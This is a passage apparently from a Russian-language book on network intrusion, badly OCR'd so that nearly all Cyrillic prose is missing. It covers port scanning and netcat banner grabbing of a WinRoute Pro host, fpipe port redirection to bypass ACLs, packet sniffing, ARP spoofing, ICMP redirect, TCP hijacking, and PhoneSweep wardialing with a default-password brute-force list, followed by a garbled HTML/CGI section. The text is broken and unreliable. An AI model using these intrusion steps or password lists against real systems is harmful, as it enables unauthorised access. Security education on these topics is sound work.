=i J 1.0.0.7 ALEX-1
|
*
21 File Transfer Protocol [Conlrol]
e 25 Simple Mail Transfer
H 220unspetiliedhoslESMTP-WinFloutePra42.4..
tf 80 Worldwide Web HTTP
*-- 106 3COM-TSMUX
e- 110 Post Ollice Prolocol Version 3
0 *OK WinRoule Pro 4 2.4 POP3 server ready < 1352.1047470467@ui]B

Min

. 16.5.
WinRoute
, 1-1 25 110 SMTP
, WinRoute Pro 4.1.30 - ! ,
1-1 3128 -, WinRoute Pro, 3129, WinRoute Pro (. 16.6).

270
SupeiScan 3 00

- Hostname Lookup [1.0.0.7

11

Resolved |ALEX-1

|| Me || Interfaces
Timeout

Ping
Connect
[2000
0 Ignore IP zero
0 Ignore IP 255
C3 Extiacl from file I -> I

Read
|4000 I

Scan type
0 Resolve hostnames
0 Only scan responsive pings
0 Show host responses

Lookup

-Scan

Ping only
Every port in list
All selected ports in list
All list ports Irom
All potts from

110 Post Office Protocol-Vt


135 DCE endpoinl resolution
139 NETBIOS Session Service
143 Internet MessageAccess Protocol
143 hltps MCom
445 Microsoll-DS
1055
1092
3128 Squid Proxy
3123

Puc. 76.6. WinRouter Pro


,
1-1, netcat, , ..
, ,
. . 16.7 SMTP ( 25) ( 110) netcat.
j Command Prompt

C:\Test\netcat>nc - -n 1.0.0. 25
(UNKNOUN) [1.0.0.7] 25 (?) open
220 unspecified.host ESHTP - UinRoute Pro 4.1.30
quit
221 UinRoute Pro SMTP Service closing transmission channel
C:\Test\netcat>nc -u -n 1.0.0.7 110
(UNKNOUN) [1.0.0.7] 110 (?) open
+< IdinRoute Pro 4.1.30 POPS server ready <320.1046930623@unsp
quit
+OK UinRoute Pro POPS server signing off
:\Test\netcat>_

. 16.7.

-
, 9 10 .

16.

271

, WinRoute Pro
. , , , IDS (Intrusion Detecting System -
),
ICMP, WinRoute.

, traced
W2RK. ICMP-,
Sword-2000 , . 16.8.
=~ Command Prompt

C:S>tracert -h 1.0.0.1
Tracing route to SUORD-2QOO [1.0.0.11
ouei* a maximum of 5 hops:
1
3
4
5

1ms

1 me
1 m s flI.EX-1 [2.Q.Q.I]
' '
Request timed out.

*
Request timed out.
*
*
Request timed out.
*

Request timed out.

Trace complete.

Puc. 16.8. Sword-2000- !


, . 16.8,
1-1 ,
( ). ,
, - Sword-2000 - . - ,
Sword-2000. , . .

WinRoute Pro
1-1,
. 16.6, 3129 WinRoute Pro, - ,
. :
> (' , 1-3)
W i n R o u t e Pro
,

272

* * WinRoute Pro WinRoute Administration (Start


Programs * WinRoute Pro * WinRoute Administration). ,
. 16.9.
Open Configuration
> WinRoute Host ( WinRoute) IP-
WinRoute,
- 1.0.0.7.

-Configuration
Enler a hoslname of an IP address of a computer funning
WinRoute:
WinRoute Host:

localhosll

Username: [Admin

Password: \
W i n Route Username (
Cancel
OK
) Admin,
Puc. 16.9.
Password
()

WinRoute
.

> , - - ,
WinRoute
(. 16.10).
Action

View

Settingi

Window

Help

Puc. 16.10.
WinRoute Alex-1 !
- , ACL .
, -
, , .
[3] , ,
- . ,
WinRoute ( - ) -
.

16.

273

,
, - ! , ?
()
, .

Win Route Pro



,
, .
( ), ,
, . .
[3],
. , TCP-, .
,
. , .
, . , . NetBUS,
14. - , ,
, .
fpipe, foundstone_tools
(http://www.foundstonetools.com), ,
TCP UDP , ,
.
,
ACL
, .. ACL .

cnuckoB ACL
, ACL
, nmap (http://www.insecure.org/nmap),

274

, U N I X (
Windows NT/2000/XP -).
.
ICMP ( , D ).
, ICMP
TCP SYN . , ICMP;
, IP- .
, ICMP, ( ),
, ICMP,
, -
, .
nmap ( hping
(http://www.kyuzz.org/antirez), Unix), ,
, SuperScan
1-1 - . 16.5
FTP-. .

npomokoAa FTP
FTP
FTP TCP/IP .
FTP- FTP- TCP- (.. , TCP). , - .
FTP-
21.
.
. (.. ) ,
1023, , 20.
.

.
.
.
, TCP , - . FTP-

16.

275

FTP
, ,
.
, . ACL.

cnucku ACL
, ACL
,
. - , -
. . , TCP 1-1 FTP-
1024 , , .. . 16.11. Incoming | Outgoing |
Novell 2000 Adapter.
-ljl Realtek RTL8029(AS) Ethernet Adapt
| <f TCP Any host all ports -> Any host porbl 023
1
TCP Any host all ports > Any host all ports

Add..

*..

Remove

Puc. 16.11.
- !
, Alex- , , NetBUS,
Alex-, TCP-
NetBus 20034. , ACL. , FTP ,
.

276


- , 21,
fpipe 20034 , .
- ,
! , , - ,
Web- TCP- 80, - ,
, .
, ACL
, . , , .
ACL ,
, ACL. , .


, , [3],
,
.
( )
. . ,
.
, ,
, .
- . -,
ICMP,
, .
' ,
WinRoute'He . -, , .
. -,
- ,
, ACL - , , , .

17.


,
. , , TCP-,
, , , , . , Unix, , Unix [12]. Windows, , ,

-,
.
, ,
,
.


Ethernet ,
. Ethernet
- ,
,
. , , -
. ,
, (
).
- SpyNet, Web-. SpyNet
http://members.xoom.com/Iayrentiu2/, -
.
SpyNet - CaptureNet PipeNet. CaptureNet ,
Ethernet , .. Ethernet. PipeNet Ethernet , ,
, , HTTP (
Web-) .

278

, - SpyNet PipeNet HTTP, SpyNet . SpyNet


, - i SfA secret.txt -

Sword-2000 Alex-
This is a very big secret
Windows. 1-1
CaptureNet,
Ethernet. . 17.1
. 17.1.
secret.txt; - Notepad
Ethernet.
Ethernet .
> Alex- CaptureNet.
Capture Start ( *
) .
> Windows security.txt
Sword-2000 1-3.
> secret.txt Capture * Stop
( ) .
Ethernet CaptureNet (. 17.2), Ethernet, .
-ile

View

Capture

Help

XiFBTt
Pockets in buffer

Adopter: Reeltek
MA.C ad dres s

I5254AE

P address

[ggjj;

Capture

No.

BO

78

& PeepNetl

| T||| Fr... | Protocol

1.

61

1.

62

B4
65
66
67

1.
1.
1.
1.
1.

BO..
BO..
BO
BO..
BO..
BO..
BO..
80..

| Addr. IP src I Addr. IP E

IBM Nelbio
IBM Natbia
IBM Netb 0
HIM Netbio
IBM Nelbio

No IP Add...
No IP Add...

IBM Netbio
IBM Netbio
IBM Netbio

No IP Add...
No IP Add...

No P Add
No IP Add...
No IP Add...

No IP Add...

No
No
No
No
No
No
No
No

IP Ad
IP Ad
P Ad
IP Ad
IP Ad
IP Ad
IP Ad
IP Ad

13 Display capture
Filter
Hardware,Filter
Promiliscuous

00 00 00 00 00 1A 00

61 20 76 65 72 79 20 62 This is very bI
74
ig secret

P Directed

Puc. 17.2. Ethernet

17.

279

, , This is a very big secret (


).
, - , . CaptureNet ,
,
. ,
SpyNet.
,
. , , . , Windows ,
.


,
CaptureNet, , . SpyNet , , ,
.
tcpdump (http://www.tcpdump.org), .
, , AntiSniff (http://www.securitysoftwaretech.com/antisniff), , .
-
- .
,
IP-, . , , , , .
, ( . [2]),
AntiSniff.
, ,
- , , , .
. .

280

ARP

IP- IP-,
ARP (Address Resolution Protocol - ).
ARP D,
() IP- (-), . ,
ARP
.

IP-,
IP- . IP- .
- , ,
nbtstat W2RK.
- , ARP-
IP- - . , IP- - ; , IP- - .
- ARP . IP-
- , , , , .

- IP- . , , , arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) .
ARP [3], [4] [12],
, ARP .
UNIX ARP
,
, arpredirect. , Windows 2000/XP
, -, . , NTsecurity
(http://www.ntsecurity.nu) GrabitAII,
.

17.

281

GrabitAII ,
.


,
- -, , ,
ICMP- Redirect. Redirect , RFC-1122,
, , , .
Redirect , Redirect, Redirect
, .
, ,
, IP- ,
. , IP-,
IP- IP- ,
. ICMP Redirect , IP-
. , IP- .
(, ) ICMP Redirect, -
tracert ( Unix
tracerout). , , , ( . [12]).
( ) ,
, .
, , . ,
4 VPN (Virtual Private
Network - ).
, [7]
, PGP Desktop Security (http://www.pgp.com).

282

TCP-

TCP- (TCP hijacking), TCP- . , TCP TCP, .
TCP- , , , [3], Unix, Web
. , , , TCP- . (

http://www.cri.cz/-kra/index.html,
TCP- Hunt (Pavel Krauz)).
, , TCP-,
. TCP-
TCP- D ,
- TCP-?
, , , [12] [13].
TCP (Transmission Control Protocol - )
OSI, .
, , , .
TCP TCP/IP,
.
TCP- TCP- 32-
, , .
TCP-, . 6 ( ):
URG - ;
- ;
PSH - ;
RST - ;

17.

283

SYN - ;
FIN - .
TCP-.
1. TCP- , :
-> : SYN, ISSa
, SYN
(Synchronize sequence number - ),
32-
ISSa (Initial Sequence Number - ).
2.

, SYN . - ISSb;
ISSa,
, . ,
:
-> A: SYN, , ISSb, ACK(ISSa+1)

3.

, , :
; ISSa + 1;
ISSb + 1. TCP-
:
-> : , ISSa+1, ACK(ISSb+1)

4.


TCP-:
-> : , ISSa+1, ACK(ISSb+1); DATA
DATA .

TCP- , TCP- TCP-


32- - ISSa
ISSb. , ISSa
ISSb, TCP-.
,
ISSa ISSb TCP TCP-,
TCP-,
!
TCP- ,
FTP TELNET TCP, FTP TELNET- TCP.

284

, FTP TELNET IP- ,


FTP TELNET
IP- . FTP TELNET IP-, , , , -
.
, 32- ISSa
ISSb, TCP-.
. ,
, ISSa ISSb
. , ,
TCP ,
, , , TCP-.
,
.
ISSa ISSb .
.

ISSa ISSb.

TCP-

TCP-
rsh- Unix.

TCP
.
Unix . ( , r- ). TCP-, TCP- .
,
. [13], , , .

17.

285

, ,
. , .. ; ,
, TCP-.

.
, , .. .
, , ,
. - VPN .
PGP Desktop Security (
, , [7]).

18.

XakuHz
, , . , ,
, (
, ), - , , . ,
-
.
- , ,
.

, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THN-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, ( )

PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,

18.

287

, ,
, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.

UcmoMHuku
- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
, -

288

, ,
.
.
, - . , PhoneSweep
,

(, ).

CkaHep PhoneSweep 4.4


PhoneSweep - , .
, - . -
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.

/
(Point-to-Point protocol - ).

, 1 4.
I/ , .
PhoneSweep.

PhoneSweep 4.4
PhoneSweep Demo , -.

18.

289


(. 18.1).
This is a demonstration version of Sandstorm
Enterprises' PhoneSweep (tm) telephone
scanning application. The demonstration version
will NOT actually test computer system security
on telephone networks. It mey be used and
distributed freely, provided that neither the
program nor its components are modified, end
that Sandstorm's copyright remains intact.
End User License Agreement
Sandstorm Enterprises Inc. ("Sandstorm") and/or
its suppliers own these programs and their
documentation, which are protected under
applicable copyright laws. Your right to use the
programs end the documentation is limited to the
terms end conditions described below.
1. License: YOU MAY: (a) use the enclosed
programs on a single computer; (b) physically
transfer the programs from one computer to
another; (c) make a copy oi the programs for
I (Accept I j JTJecline | [Copy to Clipboard [
Load Profile
New

0 Current

Select From List

Puc. 18.1. PhoneSweep


Default ( ),
Current () I Accept ( ). PhoneSweep 4.4 Demo, . 18.2.
plPhoneSweep 4.4 Demo - localhost - DEFAULT

HHE

File View Help

>.

Start

Stop iRescani

fr

Save Revert Default

2;
Import Export

Report

ig?

Graph

Dist

What's this?

J V/,
Ehone Numbers | Results li Status |! History |j Setup
Prefix V 1 Number
1^555-00
%55S-1 0
^555-20

l|aU [Time

1 Modem

| Result

1 4| System ID

11

fc

Add
>?5

Delete

>

1
Idle

1.

"

"

SSS-lsl.i|[j

Puc. 18.2. PhoneSweep



10-1687

290

PhoneSweep 4.4 Demo


File (), View () Help (). ,
. , .
PhoneSweep 4.4 Demo
PhoneNumbers ( ), Results (), Status (),
History () Setup (). , .
PhoneSweep 4.4 Demo
.

(. ).
PhoneSweep 4.4 Demo , . , . , PhoneSweep
,
/ , ,
, ,
.
, PhoneSweep .


, (
).
Start (). ;
Start (), , . 18.3,
. ,
Default ,

Setup ().

18.

291
_1

PhoneSweep 4.4 Demo - localhost - DEFAULT


File View Help

Start Stop

Rescan

&

Seve Revert Default

&

Import Export Report Graph

> Start Now


Schedule Start.

itstoiy | Setup |

Cancel Scheduled Start

me

| Modem

| Result

&
Dist

What's this?

V-

j -0*| System ID

1I

Schedule Stop...

Add

Cancel Scheduled Stop


Delete

Idle

11 ~"ff~ !lty -"FF- I

. 18.3.
Stop (). .
Stop () ,
.
Rescan ( ).
, .
PhoneSweep Demo - New Profile (PhoneSweep Demo - ),
. 18.4.
Save (). , .
Revert ().
, , .

PhoneSweep 4.4 Demo - New Profile


Please enter a new profile name:
[DEFAULT
QK

Cancel

Puc. 18.4.

Default ( ). .
import ().
/ bruteforce.txt.
Export (). ( ),
.
-

292

Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .


PhoneSweep 4.4 Demo

(. 18.5) ,
.
PJIphoneSweop 4 4 Demo - localhost - DEFAULT
;ile View Help
>. % _
Start Stop Rescan

Sftv* Revsrt Default

&

Import Export Report Graph

Dist

v?

What's this?
V.

Phone Numbers j Results || Status | Histoty | Setup |


Profiles; [Modems | lime |. Effort j Dialing ] Remote |j Alerts j
This is demonstration profile tor PhoneSweep
4.Q Demo.
Click in this box to edit this note,
or click on "New" to create u new profile.

Open

New

Copy
6<
Delete

Save
Undo
*

Idle

1 -OFF- ip -BFF- 1

Puc. 18.5.
Profiles ()
, Profiles
(), Setup (), . 18.3.
Open (). .
Profiles () . 18.5.
New profile ( ). . Profiles () . 18.5.

18.

293

Copy profile ( ).
( ).
Profiles () . 18.5.
Delete (). .
Profiles () . 18.5.
Save (). ,
, . Profiles ()
. 18.5.
Undo (). . Profiles ()
. 18.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 18.6.
_ |n|x

IpflPhoneSweep 4.4 Demo - localhosl - DEFAULT


File View Help

>.

SJ

Start Stop Rescen

(5>

Save Revert Default

Import Export Report Graph

Dist

Phone Numbers || Results | Status


Time
(Modem
1
2003-03-20 11:47
1
2003-03-20 1 1 47
2003-03-2011:46
1

Idle

Wriat's this?
4%

tiistory

| Number
555-0003
555-20 4
555-2014

Setup

[Result
|-u|SystemD
Simulator
CARRIER
NG
ILE
TIMEOUT

User ID

Freeze
D
Clear

[j^

rjc^J^J^^J^|iSiBO

. 18.6. History ()

294

Thaw (). History ().


History () . 18.6.
Clear (). . History () Phone Numbers (
) . 18.6.
Add (). . Phone Numbers ( ) . 18.3. Clear () Add () Add Phone
Numbers ( ), - raPhoneSweep 4.4 Demo - Add P..
. 18.7 From: \
To:
Add ().
Note:
Delete ().
.

r-Dial

0 E usiness Outside

Weekend | All |

r-Dial

[ojach Time Period

Any Tirne Period

Add/Save (/).
1
1 OK 1

, Add Phone . 18.7.

Numbers ( ).

cmpoke
PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
. Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.

18.

295

Effort level ( ) - - ,
, .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - ,
PhoneSweep
. , .
-
PhoneSweep , .

PhoneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 18.5 .
> Phone Numbers ( ),
. 18.2, , Add (), Add
Phone Numbers ( ), . 18.7,
.
> PhoneSweep Start ()
.
, ,
(dialing riles).


PhoneSweep , ,
.
PhoneSweep, , , , -
.

296

, PhoneSweep
.

fbpagok u
.
Add Phone Numbers ( ) (. 18.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
Time (), Setup (), . 18.8.
PfjPhoneSweep 4.4 Demo - localhost - DEFAULT
File View Help

>.

Start Stop Rescen

&

Save Revert Delault

51

Import Export Report Graph

Dist

^?

What's this?
7%

I
I
I
Ehone Numbers | Besults li Status lUstory "I Setup
Profiles |j Modems | pmej [ Effort jl Pjaling | Remote | Alerts |
Time Period
Start Mrs Minutes End Hrs Minutes
Business Hours: | 09 E 00 |16 EH
Blackout Hours: |00 [] 00 [3 [00

Weekends: Monday TuesdayD WednesdayD ThursdayQ Friday


0

Saturdays

Sunday

Import Time Periods: El Business^ OutsidelZ Weekend


Delay Between Calls |5

3 Seconds

Time Period Rings


Business:
4
'
Outside:
Weekend:

Idle

10

'

Seconds
or [50
[~_

or [92

or

]
[92

|
[

OS -BFF- IL3 -BFF- ^111

. 18.8.

Business Hours ( ) Blackout Hours ( )
, , , , .
Weekends () ( ). Import Time
Period ( ) , .

18.

297

Time () Rings
() Seconds (), , , , .
Business ( ), Outside ( ) Weekend
(). , . 18.8 , 10 , 92 .
, Time ()
, .
?
- Effort ().

Hacmpouka
Effort () . 18.9.
tTlphoneSweep 4.4 Demo - localhost - DEFAULT

File View Help


>.

Start Stop Rescan

Save

Revert

Default

Impo 1 Export Report Graph

Hill
Phone Numbej'SjI^Besults | Status \\ tiistory

Setup

Dist

What's this?
1%

~i

i Time [ Effort 1 Djaling :" Rem Qte |f Alerts |

Profiles p Modems
Current Effort Level:

Connect

Connectto answering phone numbers


then disconnect immediately.

Set Level:

Connect

Scan For:

vlodems Only

Username

Penetrate Level Options:

|Pas sword

Lj

Maximum Guesses Per Username Per Day: Unlimited


Maximum Calls Per Number Per Day:
0 Recycle Names
0 Find Modems First
Idle

Unlimited J root
root
guess

toor
syzygy
123

H|Add||Del|
pi

11 ...-BFF- ita .-.-..]|11


. 18.9.

. 18.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).

298

Penetrate Level Options ( )


, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
, Maximum Calls Per
Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 18.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.i
largebruteback.txt: ,
largebrute.txt, .

18.

299

, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
, PhoneSweep - ,
, .
- THN-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- - .
, ,

TeleSweep
Secure
(http://www.securelogix.com) Secure Logix.OdnaKO,
[14], TeleSweep Secure - , .

, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .

, , , .

HTML u DHTML
Web-,
HTML - ,
. , , , ( tag - ) HTML, , ,
.
, HTML . - HTML Web. ,
Web- - , - Web , , .
Web Web ,
, - ,
.
,
Web. HTML.


HTML
, HTML ,
. HTML,
.
, HTML ,
HTML, . .1 HTML.
. HTML
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"
"http://www.w3.org/TR/REC-html40/strict.dtd">
<HTML>
<HEAD>

<META HTTP-EQUIV="Content-Type" content="text/html";


CHARSET="windows-1252">

301

< http-equiv="Content-Language" content="ru">


< NAME="keywords" =", HTML">
< NAME="description" =" HTML">
<1> HTML</TITLE>
</HEAD>
<BODY>
<> HTML-
</BODY>
</HTML>
. . 1 HTML . 1 IE 5.
]

. . 1. HTML- IE 5
HTML . , HTML.

<JDOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"

HTML - , HTML 4. , - EN ().
HTML 4 , , , HTML . <HTML> , HTML,
.

Cmpykmypa goky/ HTML


, HTML . , . HTML,
, .
HTML, .
, <HEAD>.
, .
<BODY>
<FRAMESET>, Web- - -

302

, .
,
,
Web HTML. .
- ,
HTML .
, HTML, (, , ) .
, , ,
(, , ) , . HTML , .. (. ), <SCRIPT>.

- ,
. , HTML,
.. , , .
HTML <OBJECT> <APPLET>
( W3C HTML).
HTML, ,
<IFRAME>,
HTML. <IFRAME> , , ,
IE 5
<IFRAME> .
<SCRIPT>, <OBJECT> <IFRAME>.

HTML
.1, (, HTML),
. - </HTML>, . , , - .
, <> .
, , .
, , , ; .
<>, , , , .

303

- , ,
<HEAD> <>. , , . , <HTML LANG="ru" DIR="LTR"> LANG, HTML ( "ru" ), DIR, ,
"LTR" - (, ).
HTML :
<_ _> </_>
, HTML. HTML 4
( http://www.w3.org)
, ,
.

>
, HTML HTML
, , Web. HTML 4
<OBJECT>,
HTML
- <APPLET>, <IMG>,
<EMBED> .
<OBJECT> , .
ID - .
CLASSID - , . , CLASSID URL - , - DATA (. ).
CODEBASE - ,
(, CLASSID, DATA
ARCHIVE). CODEBASE , URL .
CODETYPE - , , CLASSID. , ,
"text/html", "image/gif", "video/mpeg", "text/javascript", , , HTML, GIF, MPEG JavaScript.
DATA - . ,
, DATA . URL, , CODEBASE.

304

TYPE - , DATA.
ARCHIVE - URL
, , ,
CLASSID DATA.


, ,
.GIF, , .
, , . <OBJECT> HTML - , , HTML. .2
HTML <OBJECT>, - Microsoft Media Player.
.2. HTML
<HTML>
<HEAD>
<1> <OBJECTx/TITLE>
</HEAD>
<BODY>
3BJECT
ID="WinPlayer"
CLASSID="clsid:22D6F312-BOF6-llDO-94AB0080C74C7E95">
</OBJECT>
</BODY>
</HTML>
</HTML>

To, IE 5 .2,
. .2.
^ <O8JECT> ...
'

| \
jj ||

. .2. - Windows Media Player

305

.2 CLASSID ,
DBJECTX
CLSID, Windows ,
,
Microsoft.

CLSID , OLE (Object Linking and Embedding - ). OLE - - Microsoft, . OLE , , , Windows. OLE , , , ActiveX.
OLE
.

, , , <OBJECT> , , . , Web,
, - <IFRAME>.

Te2<IFRAME>
HTML HTML
Web; ( frame , ). , , .
Web- HTML ,
, .
<IFRAME>
HTML. . HTML
<IFRAME>, , .
.. HTML
<HTML>
<HEAD>
<1> </1>

306

</HEAD>
<BODY>

Opel.
<IFRAME SRC="specification.html" WIDTH="250" HEIGHT="16"
SCROLLING="autO" FRAMEBORDER="1" >
</IFRAME>
.
</BODY>
</HTML>
HTML . IE 5
. ..
J - Microsoft Internet Explorer ...
]

'

(3 | &


Opel. |
I

- Oft!

. .. HTML
<IFRAME>, , , , , <IFRAME>
,
. .

HTML
HTML ,
, ,
. , HTML. HTML
<Form>, - <Script>. .

<Form>
.4 HTML , . IE 5 . .4.
.4. Web
<HTML>
<HEAD>
<1> </1>

307

</HEAD>
<BODY>

<> </>
<FORM
METHOD="post">

ACTION="http: //www.anysite.com/prog/addsubs"

<INPUT TYPE="text" ID="firstname">


<LABEL FOR="firstname">MMa: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL ="18">: </LABEL><BR>
<INPUT TYPE="text" NAME="postal-address" ID="email">
<LABEL FOR="email">e-mail </LABEL><BR>
<INPUT TYPE="checkbox" NAME="subscribe">
HOBOCTeu<BR>
<INPUT
TYPE="submit"
VALUE="OTnpaBHTb">
<INPUT
TYPE="reset">
</FORM>
</BODY>
</HTML>

.4. FORM, - LABEL INPUT.


LABEL -
. ,
Windows
(. . .4).
HTML
File Edit View Favorites Tools H
INPUT TYPE, "text". TYPE ,

INPUT, :
- .
:
TYPE .4, ,
e-mail
"checkbox", "submit" "reset", D
, , | || Reset |
, fr My Computer
.
,
. .4.
, , Windows.

06pa6omka
, .4.
Web- ,
, , , . -

308

() ,
. , , ,
. HTML URL, ACTION FORM, ,
, .4:
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">

, addsubs, /prog http://www.anysite.com. , ,


. .
METOD FORM. post, , - get ( ).
CGI (Common Gateway Interface - ), ,
(.
). , ,
CGI, ,
.
CGI .
1=1&2=2&...

- ( ), - (.. ). ,
, , METHOD . REQUEST_METHOD (. ).
GET URL
QUERY_STRING (. ).
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.

CONTENT LENGTH.

309

.
.4. POST (
FORM METHOD "post") - 42 , :
postal-address=ivan@email.com&subscribe=on

CONTENT_LENGTH 42,
. CONTENT_TYPE "application/x-www-form-urlencoded".
"",
.

. (, ).
, . Web-,
, , HTML,
HTML , ,
CGI, HTML . Web, .

Te 2 <SCRIPT>
<SCRIPT> HTML , ,
Web-, , - Web.
,
HTML, .
HTML ,
HTML, ,
, , Windows.
, , HTML, .
, . HTML <SCRIPT>, .
, HTML. HTML
HTML ,
.

310

, ,
, .
<SCRIPT> HTML,
, <HEAD>,
, <BODY>,
. <SCRIPT>.
SRC - URL -, .. ,
, Web.
TYPE -
<SCRIPT>. , "text/javascript"
JavaScript.
<SCRIPT> .
SRC , <SCRIPT> . SRC URL, <SCRIPT>
, URL.

- , .
.
, JavaScript,
write () .
<SCRIPT TYPE="text/javascript">
document.write (", !")
</SCRIPT>

, HTML
, <Script>.
HTML.
, ,
, .


, - , , , .
, HTML- HTML-, . HTML ,

311

HTML. ,
, . .
<AHREF="http://www.anysite.com/index.html"
1
onMouseOver="window.status='U4enKHH , ! ; return
1;"> </>
:
1

window.status='U|enKHH , ! ;
return true;
( window)
.
. HTML
.
ONLOAD ,
FRAMESET.
BODY FRAMESET.
ONUNLOAD ,
. BODY FRAMESET.
ONCLICK
.
.
ONDBLCLICK
.
.
ONMOUSEDOWN .
.
ONMOUSEUP .
.
ONMOUSEOVER . .
ONMOUSEMOVE , .
.

312

ONMOUSEOUT
.
.
ONFOCUS
.
: LABEL, INPUT, SELECT,
TEXTAREA BUTTON.

ONBLUR .
, ONFOCUS.
ONKEYPRESS , . .
ONKEYDOWN ,
. .
ONKEYUP ,
.
.
ONSUBMIT . FORM.
ONRESET .
FORM.
ONSELECT
.
INPUT TEXTAREA.

ONCHANGE
, .
: INPUT, SELECT
TEXTAREA.


. .
,
.
.
, HTML,
INPUT, SELECT, BUTTON, TEXTAREA LABEL, -

313

. ,
HTML . , ,
, .
, HTML .


.5
JavaScript, ,
, ,
.
.5. Web
<HTML>
<HEAD>
<1> </1>
<SCRIPT TYPE="text/javascript">
function checkPas sword (Password) {
if (Password != "007" ) {
alert ( " ! " ) ;
return 0;
}

else {
alert ("!") ;
return 1 ;

function welcome ( ) {
document .write ( ", ! " )
}
</SCRIPT>
</HEAD>
<BODY>
<BR>
<INPUT TYPE="text" NAME="name" ONCHANGE="if ( ! checkPas sword
(this. value) ) { this. focus ( ) /this. select ( ) ; } else { welcome()}" VALUE="">
</BODY>
</HTML>

314

. .5 IE 5.
' .
File

Edit

View

Favorites

4. Back > * " <Q Bl <a | "|| Links"


j My Computer

Puc. A. 5.
(. .6)
window.document.myform.mybutton.onclick = my_onclick.
.6.
<HTML>

<HEAD>
<11|> </1>
</HEAD>
<BODY>
<FORM NAME="myform">
<INPUT TYPE="button" NAME="mybutton" VALUE=" ">
</FORM>
<SCRIPT TYPE="text/javascript">
function my_onclick() {
alert(", !")
>
window.document.myform.mybutton.onclick = my_onclick
</SCRIPT>
</BODY>
</HTML>
.

npomokoA C6I
HTML 4,
. - ,
. , ,
- .
.
1. HTML
.
2.

- , , .. - .

3. , HTML 4
, URL, ACTION
Web
.
HTTP,
.
4. URL,
, .
5. , ,
, .
6. (
), ,
.
- .Web,
; ,
HTTP 1.1, .
CGI (Common Gateway Interface - ).
,
NCSA (National Center for Supercomputing Applications -
)
, Web.
7.

,
, METHOD
FORM. HTML 4 - POST
GET, HTTP.

8. ( ) ,
, .

316
9.

.

Web (
).

10. , ,
( )
.
11. .
,
,
- Web.
HTML 4, ,
.
HTTP,
Web.
CGI, Web-
.
.


(,
) ,
.
1. , .. ,
. ,
,
.
2.

, /.
.

3.

,
ENCTYPE FORM.

HTTP
, - .
, ,

.

317


- ,
, .
;
.
FORM
.
.
,
.
SELECT, OPTION.
SELECT .

.

.
.
,
NAME, .
, OBJECT
.

, . ,

OBJECT, DECLARE.
, ,
. , .
<FORM ACTION="http: //www.anysite.com/prog/an.yprog" METHOD="post">

<INPUT TYPE=ntextn STYLE="display:none" NAME="hide-text"


VALUE= "myname " >
</FORM>

"myname"
"hide-text" /
.

318 _



ENCTYPE FORM,
, .
,
.

Tun "application/x-www-form-urlencoded"
. ,
,
.
,
+. ,
, %,
, ASCII .
CRLF (.. %OD%OA).
/
. =,
/ &.
, , .
<FORM ACTION="http://www. anysite.com/prog/addsubs" METHOD="post ll >
<INPUT TYPE="text" 1=
<LABEL FOR="firstname">HMH: </LABELXBR>
< INPUT TYPE="text" ID= 1I lastname">
<LABEL FOR="lastname"><l>aMwiHH: </LABELxBR><INPUT TYPE="text" NAME="postal-address" lD="email">
<LABEL FOR="email">e-mail </LABELxBR>
<INPUT TYPE=" checkbox" NAME=" subscribe ">
HOBOCTeu<BR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE=" reset ">
</FORM>

Ivan Petrov
petrov@email.com
:
firstname=lvan&lastname=Petrov&postaladdress=petrov @ email. com&subscribe=on

319

Tun "multipart/form-data"
"application/x-www-form-urlencoded"
,
, ASCII. ,
, ASCII,
, "multipart/form-data".
"multipart/form-data"
,
.
,
HTML.
"Content - ", "text /plain".
, .
"Content-Disposition", "form- data".
.
, "control-name" :
Content-Disposition:

form-data;

name =" control -name"

, ,

(,
"application/octet-stream").
,
"multipart/mixed".
"multipart /form- data". ,
.
<FORM ACTION "http://www.anysite.com/cgi-bin/handler"
ENCTYPE= "multipart /form-data" METHOD="post">
<>
<INPUT TYPE="text" NAME="name_of_sender"><BR>
<>
< INPUT TYPE="file" NAME="name_of_f iles">
<HR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE="reset">
</FORM>
"ivanov"
"content.txt",
.

320

Content-Type: multipart/form-data; boundary=STRING_SEPARATOR


--STRING_SEPARATOR
